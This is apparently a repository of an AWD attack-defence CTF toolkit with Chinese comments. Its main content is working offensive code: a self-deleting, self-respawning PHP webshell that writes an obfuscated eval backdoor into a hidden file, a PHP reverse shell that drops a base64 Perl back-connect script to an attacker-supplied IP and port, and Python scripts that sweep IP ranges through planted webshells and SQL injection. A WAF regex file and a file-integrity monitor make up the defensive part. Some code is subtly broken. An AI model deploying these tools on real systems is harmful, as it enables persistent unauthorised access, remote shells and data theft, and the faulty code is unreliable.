├── 不死马.php
├── 预留后门利用.py
├── submitflag.py
├── 反弹shell.php
├── waf.php
├── 可扩展批量攻击脚本.py
└── 文件监控.py


/不死马.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 	set_time_limit(0);
 3 | 	ignore_user_abort(1);
 4 | 	unlink(__FILE__);
 5 | 	while(1){
 6 | 		file_put_contents('./.config.php', '<?php $_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_$_fF("",$_cC);@$_();?>');
 7 | 		system('chmod 777 .config.php');					
 8 | 		//持续在config.php中写入
 9 | 		touch("./.config.php", mktime(20,15,1,11,17,2017));	
10 | 		usleep(100);
11 | 	}
12 | ?>


--------------------------------------------------------------------------------
/预留后门利用.py:
--------------------------------------------------------------------------------
 1 | #coding=utf-8
 2 | import requests
 3 | url_head="http://xxx.xx.xxx."	#网段
 4 | url=""
 5 | shell_addr="/Upload/index.php"
 6 | passwd="xxxxx"					#木马密码
 7 | port="80"
 8 | payload =  {passwd: 'system(\'cat /flag\');'}
 9 | 
10 | webshelllist=open("webshelllist.txt","w")
11 | flag=open("firstround_flag.txt","w")
12 | 
13 | for i in range(30,61):
14 | 	url=url_head+str(i)+":"+port+shell_addr
15 | 	try:
16 | 		res=requests.post(url,payload,timeout=1)
17 | 		if res.status_code == requests.codes.ok:
18 | 			result = url+" connect shell sucess,flag is "+res.text
19 | 			print result
20 | 			print >>flag,result
21 | 			print >>webshelllist,url+","+passwd
22 | 		else:
23 | 			print "shell 404"
24 | 	except:
25 | 		print url+" connect shell fail"
26 | 
27 | webshelllist.close()
28 | flag.close()


--------------------------------------------------------------------------------
/submitflag.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python2
 2 | import sys
 3 | import json
 4 | import urllib
 5 | import httplib
 6 | server_host = ' '	#提交flag的服务器地址
 7 | server_port = 80
 8 | def submit(team_token, flag, host=server_host, port=server_port, timeout=5):
 9 | 	if not team_token or not flag:
10 | 		raise Exception('team token or flag wrong')
11 | 	conn = httplib.HTTPConnection(host, port, timeout=timeout)
12 | 	params = urllib.urlencode({		#提交需要post的参数,根据情况修改
13 | 		'token': team_token,	
14 | 		'flag': flag,
15 | 	})
16 | 	headers = {
17 | 		"Content-type": "application/x-www-form-urlencode"
18 | 	}
19 | 	conn.request('POST', '[submit_flag_dir]', params, headers)	#第二个参数为提交flag的目录
20 | 	response = conn.getresponse()
21 | 	data = response.read()
22 | 	return json.loads(data)
23 | 
24 | if __name__ == '__main__':
25 | 	if len(sys.argv) < 3:
26 | 		print 'usage: ./submitflag.py [team_token] [flag]'
27 | 		sys.exit()
28 | 	host = server_host
29 | 	if len(sys.argv) > 3:
30 | 		host = sys.argv[3]
31 | 	print json.dumps(submit(sys.argv[1], sys.argv[2], host=host), indent=4)


--------------------------------------------------------------------------------
/反弹shell.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 	function which($pr)	{
 3 | 		$path = execute("which $pr");
 4 | 		return ($path ? $path : $pr);
 5 | 	}
 6 | 	function execute($cfe) {
 7 | 		$res = '';
 8 | 		if ($cfe) {
 9 | 			if(function_exists('exec')) {
10 | 				@exec($cfe,$res);
11 | 				$res = join("\n",$res);
12 | 			}
13 | 			elseif (function_exists('shell_exec')) {
14 | 				$res = @shell_exec($cfe);
15 | 			}
16 | 			elseif (function_exists('system')) {
17 | 				@ob_start();
18 | 				@system($cfe);
19 | 				$res = @ob_get_contents();
20 | 				@ob_end_clean();
21 | 			}
22 | 			elseif (function_exists('passthru')) {
23 | 				@ob_start();
24 | 				@passthru($cfe);
25 | 				$res = @ob_get_contents();
26 | 				@ob_end_clean();
27 | 			}
28 | 			elseif (@is_resource($f = @popen($cfe, "r"))) {
29 | 				$res = '';
30 | 				while(!@feof($f)) {
31 | 					$res .= @fread($f,1024);
32 | 				}
33 | 				@pclose($f);
34 | 			}
35 | 		}
36 | 		return $res;
37 | 	}
38 | 
39 | 	function cf($fname, $text) {
40 | 		if($fp = @fopen($fname, 'w')) {
41 | 			@fputs($fp, @base64_decode($text));
42 | 			@fclose($fp);
43 | 		}
44 | 	}
45 | 
46 | $yourip = "your IP";
47 | $yourport = 'your port';
48 | $usedb = array('perl'=>'perl','c'=>'c');
49 | 
50 | $back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
51 | "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
52 | "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
53 | "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
54 | "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
55 | "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
56 | "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
57 | 
58 | cf('/tmp/.bc',$back_connect);
59 | $res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
60 | 
61 | //上传并访问，用nc -l -vv -p [port]反弹shell
62 | ?> 
63 | 


--------------------------------------------------------------------------------
/waf.php:
--------------------------------------------------------------------------------
 1 | <!-- 
 2 | require_once('waf.php')
 3 | 
 4 | PHPCMS V9 \phpcms\base.php
 5 | PHPWIND8.7 \data\sql_config.php
 6 | DEDECMS5.7 \data\common.inc.php
 7 | DiscuzX2   \config\config_global.php
 8 | Wordpress   \wp-config.php
 9 | Metinfo   \include\head.php
10 | -->
11 | 
12 | <?php
13 | 
14 | function customError($errno, $errstr, $errfile, $errline) {
15 | 	echo "<b>Error number:</b> [$errno],error on line $errline in $errfile<br />";
16 | 	die();
17 | }
18 | 
19 | set_error_handler("customError", E_ERROR);
20 | $getfilter="'|(and|or)\\b.+?(>|<|=|in|like)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
21 | $postfilter="\\b(and|or)\\b.{1,6}?(=|>|<|\\bin\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
22 | $cookiefilter="\\b(and|or)\\b.{1.6}?(=|>|<|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
23 | function DefendAttack($StrFiltKey, $StrFiltValue, $ArrFiltReq) {
24 | 	if(is_array($StrFiltValue)) {
25 | 		$StrFiltValue = implode($StrFiltValue);
26 | 	}
27 | 	if(preg_match("/".$ArrFiltReq."/is", $StrFiltValue)==1) {
28 | 		//slog("<br><br>操作IP: ".$_SERVER["REMOTE_ADDR"]."<br>操作时间: ".strftime("%Y-%m-%d %H:%M:%S")."<br>操作页面: ".$_SERVER["PHP_SELF"]."<br>提交方式: ".$_SERVER["REQUEST_METHOD"]."<br>提交参数: ".$StrFiltKey."<br>提交参数: ".$StrFiltValue);
29 | 		print "360WebSec notice: Illegal operation!";
30 | 		exit();
31 | 	}
32 | }
33 | //$ArrPGC = array_merge($_GET, $_POST, $_COOKIE);
34 | foreach ($_GET as $key => $value) {
35 | 	DefendAttack($key, $value, $getfilter);
36 | }
37 | foreach ($_POST as $key => $value) {
38 | 	DefendAttack($key, $value, $postfilter);
39 | }
40 | foreach ($_COOKIE as $key => $value) {
41 | 	DefendAttack($key, $value, $cookiefilter);
42 | }
43 | 
44 | if (file_exists(filename)) {
45 | 	# code...
46 | }
47 | 
48 | function slog($logs) {
49 | 	$toppath = $_SERVER["DOCUMENT_ROOT"]."/log.htm";
50 | 	$Ts=fopen($toppath, "a+");
51 | 	fputs($Ts, $logs."\r\n");
52 | 	fclose($Ts);
53 | }
54 | 
55 | ?>


--------------------------------------------------------------------------------
/可扩展批量攻击脚本.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: UTF-8 -*
  2 | #//========================================================================================
  3 | #//                                                                                        
  4 | #//  ##      ##  ######  ##   ##  ##  ##   ##  ###    ###                                
  5 | #//  ##      ##    ##    ##   ##  ##  ##   ##  ## #  # ##                                
  6 | #//  ##      ##    ##    #######  ##  ##   ##  ##  ##  ##                                
  7 | #//  ##      ##    ##    ##   ##  ##  ##   ##  ##      ##                                
  8 | #//  ######  ##    ##    ##   ##  ##   #####   ##      ##                                
  9 | #//                                                                                        
 10 | #//========================================================================================
 11 | 
 12 | import requests
 13 | import sys
 14 | import getopt
 15 | 
 16 | 
 17 | # ---------------------------------------------------------------------------- #
 18 | #                                自定义payload函数                              #
 19 | # ---------------------------------------------------------------------------- #
 20 | 
 21 | def oneword(url):
 22 | 	#根据实际情况调整
 23 | 	passwd="g"
 24 | 	payload =  {passwd: 'system(\'cat /flag\');'} 
 25 | 	path = "/Upload/xiaoma.php"
 26 | 	url = url+path
 27 | 	webshelllist = open("webshelllist.txt","a")
 28 | 	try:
 29 | 		res = requests.post(url, payload, timeout=1)
 30 | 		if res.status_code == res.codes.ok:
 31 | 			result = url+" connect shell sucess,flag is "+res.text
 32 | 			print result
 33 | 			print >>flag,result
 34 | 			print >>webshelllist,url+","+passwd
 35 | 		else:	
 36 | 			print "shell 404"
 37 | 	except:
 38 | 		print url+" connect shell fail"
 39 | 
 40 | 
 41 | def sql_inject(url):
 42 | 	#自定义payload
 43 | 	payload = "select username,passwd from USER"
 44 | 	#sql注入路径
 45 | 	path = "/admin.php?submit="
 46 | 	url = url+path
 47 | 
 48 | 	try:
 49 | 		res = requests.get(url,payload,timeout=1)
 50 | 		res = res.text
 51 | 		#可根据正则匹配扩展，懒得写了
 52 | 		if res.find('Invalid') == -1 and res.find('error')==-1: 
 53 | 			result = url+" sql inject sucess, flag is "+res
 54 | 			print result
 55 | 			print >>flag,result
 56 | 		else:
 57 | 			print " sql error"
 58 | 	except:
 59 | 		print url+" sql inject fail"
 60 | 
 61 | 	
 62 | 
 63 | 
 64 | 
 65 | # ---------------------------------------------------------------------------- #
 66 | #              定义参数方法 ，根据自己定义的payload函数修改条件                    #
 67 | # ---------------------------------------------------------------------------- #
 68 | def method(url, method):
 69 | 	method = sys.argv[2]
 70 | 
 71 | 	if method == "oneword":
 72 | 		oneword(url)
 73 | 	elif method == "sqli":
 74 | 		sql_inject(url)
 75 | 
 76 | 	
 77 | # ---------------------------------------------------------------------------- #
 78 | #                                     执行攻击                                  #
 79 | # ---------------------------------------------------------------------------- #
 80 | 
 81 | # host="http://192.168.1"+segment="1 to 255"	#主机域名+网段
 82 | def exploit(host, seg_start, seg_stop, port, method):
 83 | 	global flag
 84 | 
 85 | 	for i in range(seg_start, seg_stop):
 86 | 
 87 | 		url = host+"."+str(i)+":"+port
 88 | 		flag = open("flag.txt","a")
 89 | 		
 90 | 		try:
 91 | 			method(url, method)
 92 | 		except:
 93 | 			print url+"expolit fail"
 94 | 			continue
 95 | 		
 96 | 	flag.close()
 97 | 
 98 | 
 99 | def usage():
100 |     print "AWD批量攻击脚本 by Lithium"
101 |     print
102 |     print "Usage: exploit.py -h [host] -a [seg_start] -b [seg_stop] - p [port] -m [method]"
103 |     print
104 |     print "-h --host		host to C name, examples:192.168.0"
105 |     print "-a --seg_start	network segment range start, range is 0 to 255"
106 |     print "-b --seg_stop	network segment range stop, range is 0 to 255"
107 |     print "-p --port		the port which services denpend on, range is 0, 65535 (Most Web Service is at 80)"
108 |     print "-m --method		the exploit method, denpends on your define"
109 |     print
110 |     print "Examples:"
111 |     print "exploit.py -h 192.168.0 -a 30 -b 51 -p 80 -m oneword"
112 |     print "exploit.py -h 192.168.0 -a 30 -b 51 -p 80 -m sqli"
113 |     sys.exit(0)
114 | 
115 | 
116 | if __name__ == '__main__':
117 | 
118 | 	print "//========================================================//"
119 | 	print "//                                                 	 //"                                   
120 | 	print "//  ##      ##  ######  ##   ##  ##  ##   ##  ###    ###  //"                             
121 | 	print "//  ##      ##    ##    ##   ##  ##  ##   ##  ## #  # ##  //"                              
122 | 	print "//  ##      ##    ##    #######  ##  ##   ##  ##  ##  ##  //"                              
123 | 	print "//  ##      ##    ##    ##   ##  ##  ##   ##  ##      ##  //"                              
124 | 	print "//  ######  ##    ##    ##   ##  ##   #####   ##      ##  //"                              
125 | 	print "//                                                        //"                                
126 | 	print "//========================================================//"
127 | 
128 | 
129 | 	if not len(sys.argv[1:]):
130 | 		usage()
131 | 	try:
132 | 		opts, args = getopt.getopt(sys.argv[1:], "Hh:a:b:p:m:", ["help","host", "seg_start", "seg_stop", "port", "method"])
133 | 	except getopt.GetoptError as err:
134 | 		print str(err)
135 | 		usage()
136 | 
137 | 	for o,a in opts:
138 | 		if o in ("-H","--help"):
139 | 			usage()
140 | 		elif o in ("-h", "--host"):
141 | 			host = a
142 | 		elif o in ("-a", "--seg_start"):
143 | 			seg_start = a
144 | 		elif o in ("-b", "--seg_stop"):
145 | 			seg_stop = a
146 | 		elif o in ("-p", "--port"):
147 | 			port = a
148 | 		elif o in ("-m", "--method"):
149 | 			method = a
150 | 		else:
151 | 			assert False,"Unhandled Option"
152 | 		
153 | 	exploit(host, seg_start, seg_stop, port, method)
154 | 


--------------------------------------------------------------------------------
/文件监控.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | #use: python file_check.py ./
  3 | 
  4 | import os
  5 | import hashlib
  6 | import shutil
  7 | import ntpath
  8 | import time
  9 | 
 10 | CWD = os.getcwd()
 11 | FILE_MD5_DICT = {}      # 文件MD5字典
 12 | ORIGIN_FILE_LIST = []
 13 | 
 14 | # 特殊文件路径字符串
 15 | Special_path_str = 'drops_JWI96TY7ZKNMQPDRUOSG0FLH41A3C5EXVB82'
 16 | bakstring = 'bak_EAR1IBM0JT9HZ75WU4Y3Q8KLPCX26NDFOGVS'
 17 | logstring = 'log_WMY4RVTLAJFB28960SC3KZX7EUP1IHOQN5GD'
 18 | webshellstring = 'webshell_WMY4RVTLAJFB28960SC3KZX7EUP1IHOQN5GD'
 19 | difffile = 'diff_UMTGPJO17F82K35Z0LEDA6QB9WH4IYRXVSCN'
 20 | 
 21 | Special_string = 'drops_log'  # 免死金牌
 22 | UNICODE_ENCODING = "utf-8"
 23 | INVALID_UNICODE_CHAR_FORMAT = r"\?%02x"
 24 | 
 25 | # 文件路径字典
 26 | spec_base_path = os.path.realpath(os.path.join(CWD, Special_path_str))
 27 | Special_path = {
 28 |     'bak' : os.path.realpath(os.path.join(spec_base_path, bakstring)),
 29 |     'log' : os.path.realpath(os.path.join(spec_base_path, logstring)),
 30 |     'webshell' : os.path.realpath(os.path.join(spec_base_path, webshellstring)),
 31 |     'difffile' : os.path.realpath(os.path.join(spec_base_path, difffile)),
 32 | }
 33 | 
 34 | def isListLike(value):
 35 |     return isinstance(value, (list, tuple, set))
 36 | 
 37 | # 获取Unicode编码
 38 | def getUnicode(value, encoding=None, noneToNull=False):
 39 | 
 40 |     if noneToNull and value is None:
 41 |         return NULL
 42 | 
 43 |     if isListLike(value):
 44 |         value = list(getUnicode(_, encoding, noneToNull) for _ in value)
 45 |         return value
 46 | 
 47 |     if isinstance(value, unicode):
 48 |         return value
 49 |     elif isinstance(value, basestring):
 50 |         while True:
 51 |             try:
 52 |                 return unicode(value, encoding or UNICODE_ENCODING)
 53 |             except UnicodeDecodeError, ex:
 54 |                 try:
 55 |                     return unicode(value, UNICODE_ENCODING)
 56 |                 except:
 57 |                     value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
 58 |     else:
 59 |         try:
 60 |             return unicode(value)
 61 |         except UnicodeDecodeError:
 62 |             return unicode(str(value), errors="ignore")
 63 | 
 64 | # 目录创建
 65 | def mkdir_p(path):
 66 |     import errno
 67 |     try:
 68 |         os.makedirs(path)
 69 |     except OSError as exc:
 70 |         if exc.errno == errno.EEXIST and os.path.isdir(path):
 71 |             pass
 72 |         else: raise
 73 | 
 74 | # 获取当前所有文件路径
 75 | def getfilelist(cwd):
 76 |     filelist = []
 77 |     for root,subdirs, files in os.walk(cwd):
 78 |         for filepath in files:
 79 |             originalfile = os.path.join(root, filepath)
 80 |             if Special_path_str not in originalfile:
 81 |                 filelist.append(originalfile)
 82 |     return filelist
 83 | 
 84 | # 计算机文件MD5值
 85 | def calcMD5(filepath):
 86 |     try:
 87 |         with open(filepath,'rb') as f:
 88 |             md5obj = hashlib.md5()
 89 |             md5obj.update(f.read())
 90 |             hash = md5obj.hexdigest()
 91 |             return hash
 92 |     except Exception, e:
 93 |         print u'[!] getmd5_error : ' + getUnicode(filepath)
 94 |         print getUnicode(e)
 95 |         try:
 96 |             ORIGIN_FILE_LIST.remove(filepath)
 97 |             FILE_MD5_DICT.pop(filepath, None)
 98 |         except KeyError, e:
 99 |             pass
100 | 
101 | # 获取所有文件MD5
102 | def getfilemd5dict(filelist = []):
103 |     filemd5dict = {}
104 |     for ori_file in filelist:
105 |         if Special_path_str not in ori_file:
106 |             md5 = calcMD5(os.path.realpath(ori_file))
107 |             if md5:
108 |                 filemd5dict[ori_file] = md5
109 |     return filemd5dict
110 | 
111 | # 备份所有文件
112 | def backup_file(filelist=[]):
113 |     # if len(os.listdir(Special_path['bak'])) == 0:
114 |     for filepath in filelist:
115 |         if Special_path_str not in filepath:
116 |             shutil.copy2(filepath, Special_path['bak'])
117 | 
118 | if __name__ == '__main__':
119 |     print u'---------start------------'
120 |     for value in Special_path:
121 |         mkdir_p(Special_path[value])
122 |     # 获取所有文件路径，并获取所有文件的MD5，同时备份所有文件
123 |     ORIGIN_FILE_LIST = getfilelist(CWD)
124 |     FILE_MD5_DICT = getfilemd5dict(ORIGIN_FILE_LIST)
125 |     backup_file(ORIGIN_FILE_LIST) # TODO 备份文件可能会产生重名BUG
126 |     print u'[*] pre work end!'
127 |     while True:
128 |         file_list = getfilelist(CWD)
129 |         # 移除新上传文件
130 |         diff_file_list = list(set(file_list) ^ set(ORIGIN_FILE_LIST))
131 |         if len(diff_file_list) != 0:
132 |             # import pdb;pdb.set_trace()
133 |             for filepath in diff_file_list:
134 |                 try:
135 |                     f = open(filepath, 'r').read()
136 |                 except Exception, e:
137 |                     break
138 |                 if Special_string not in f:
139 |                     try:
140 |                         print u'[*] webshell find : ' + getUnicode(filepath)
141 |                         shutil.move(filepath, os.path.join(Special_path['webshell'], ntpath.basename(filepath) + '.txt'))
142 |                     except Exception as e:
143 |                         print u'[!] move webshell error, "%s" maybe is webshell.'%getUnicode(filepath)
144 |                     try:
145 |                         f = open(os.path.join(Special_path['log'], 'log.txt'), 'a')
146 |                         f.write('newfile: ' + getUnicode(filepath) + ' : ' + str(time.ctime()) + '\n')
147 |                         f.close()
148 |                     except Exception as e:
149 |                         print u'[-] log error : file move error: ' + getUnicode(e)
150 | 
151 |         # 防止任意文件被修改,还原被修改文件
152 |         md5_dict = getfilemd5dict(ORIGIN_FILE_LIST)
153 |         for filekey in md5_dict:
154 |             if md5_dict[filekey] != FILE_MD5_DICT[filekey]:
155 |                 try:
156 |                     f = open(filekey, 'r').read()
157 |                 except Exception, e:
158 |                     break
159 |                 if Special_string not in f:
160 |                     try:
161 |                         print u'[*] file had be change : ' + getUnicode(filekey)
162 |                         shutil.move(filekey, os.path.join(Special_path['difffile'], ntpath.basename(filekey) + '.txt'))
163 |                         shutil.move(os.path.join(Special_path['bak'], ntpath.basename(filekey)), filekey)
164 |                     except Exception as e:
165 |                         print u'[!] move webshell error, "%s" maybe is webshell.'%getUnicode(filekey)
166 |                     try:
167 |                         f = open(os.path.join(Special_path['log'], 'log.txt'), 'a')
168 |                         f.write('diff_file: ' + getUnicode(filekey) + ' : ' + getUnicode(time.ctime()) + '\n')
169 |                         f.close()
170 |                     except Exception as e:
171 |                         print u'[-] log error : done_diff: ' + getUnicode(filekey)
172 |                         pass
173 |         time.sleep(2)
174 |         # print '[*] ' + getUnicode(time.ctime())


--------------------------------------------------------------------------------